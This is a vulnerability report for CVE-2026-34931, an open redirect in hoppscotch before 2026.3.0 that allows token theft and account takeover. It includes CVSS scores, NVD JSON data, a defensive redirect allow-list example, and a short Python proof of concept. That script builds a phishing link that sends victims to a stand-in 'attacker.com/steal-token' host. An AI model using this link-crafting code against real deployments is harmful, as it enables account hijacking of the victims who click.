Security Vulnerability Report
CVE-2026-34931 CVSS 9.6 CRITICAL

CVE-2026-34931

Published: 2026-04-02 20:16:29
Last Modified: 2026-04-15 17:24:30

Description

hoppscotch is an open source API development ecosystem. Prior to version 2026.3.0, there is an open redirect vulnerability that leads to token exfiltration. With these tokens, the attacker can sign in as the victim to take over their account. This issue has been patched in version 2026.3.0.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hoppscotch:hoppscotch:*:*:*:*:*:*:*:* - VULNERABLE
Hoppscotch < 2026.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-34931 (Open Redirect)
# This script demonstrates how to craft a malicious URL to exploit the open redirect vulnerability.
import urllib.parse


def craft_exploit_url(base_url, malicious_url):
    """
    Constructs a URL that exploits the open redirect vulnerability.
    Replace 'redirect' with the actual vulnerable parameter if different.
    """
    # The vulnerable endpoint often accepts a 'redirect' or 'next' parameter
    params = {'redirect': malicious_url}
    query_string = urllib.parse.urlencode(params)
    exploit_url = f"{base_url}?{query_string}"
    return exploit_url


if __name__ == "__main__":
    target = "https://hoppscotch.io"  # Example target instance
    evil_site = "https://attacker.com/steal-token"
    url = craft_exploit_url(target, evil_site)
    print(f"[+] Send this link to the victim: {url}")
    print("[+] When the victim clicks, their token may be sent to the attacker.")
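As the defender-side counterpart to the PoC above, the following is an added example (not hoppscotch's code, and not a description of how the 2026.3.0 fix works, which this report does not detail) of allow-listing a redirect target against the application's own origin so that a value such as https://attacker.com/steal-token is never followed; the 'redirect' parameter name and the app.example origin are assumptions.

```python
# Added example: origin allow-listing of a redirect target, the standard
# mitigation for the open-redirect class (CWE-601). Not hoppscotch's code;
# the 'redirect' parameter name and the app origin are assumptions.
from urllib.parse import urlsplit, urljoin


def is_safe_redirect(target: str, app_origin: str) -> bool:
    """True only if `target` resolves to an http(s) URL on `app_origin`."""
    if not target or any(c in target for c in "\\\r\n\t"):
        # Browsers normalise backslashes and strip tab/CR/LF in ways that
        # urlsplit does not model, so reject rather than try to canonicalise.
        return False
    resolved = urlsplit(urljoin(app_origin, target))
    origin = urlsplit(app_origin)
    if resolved.scheme not in ("http", "https"):
        return False  # blocks javascript:, data: and similar schemes
    # Comparing the whole netloc also catches user@host forms and
    # protocol-relative '//host' values, which urljoin resolves to a
    # foreign host rather than a path on our origin.
    return (resolved.scheme == origin.scheme
            and resolved.netloc.lower() == origin.netloc.lower())


def resolve_redirect(params: dict, app_origin: str, fallback: str = "/") -> str:
    """Post-login destination: the validated 'redirect' value, else the fallback."""
    target = params.get("redirect", "")
    return target if is_safe_redirect(target, app_origin) else fallback


if __name__ == "__main__":
    app = "https://app.example"  # constructed stand-in for a real deployment
    for value in ("/dashboard", "https://attacker.com/steal-token",
                  "//attacker.com/steal-token", "javascript:alert(1)"):
        print(f"{value!r:40} -> {resolve_redirect({'redirect': value}, app)}")
```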

References

https://github.com/hoppscotch/hoppscotch/releases/tag/2026.3.0 (Release Notes)
https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-7fg7-wx5q-6m3v (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34931",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-02T20:16:28.830",
    "lastModified": "2026-04-15T17:24:29.680",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "hoppscotch is an open source API development ecosystem. Prior to version 2026.3.0, there is an open redirect vulnerability that leads to token exfiltration. With these tokens, the attacker can sign in as the victim to takeover their account. This issue has been patched in version 2026.3.0."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-601"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hoppscotch:hoppscotch:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2026.3.0",
                "matchCriteriaId": "0FF217CC-EE39-4462-91B1-AA13EDECFF36"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/hoppscotch/hoppscotch/releases/tag/2026.3.0",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-7fg7-wx5q-6m3v",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}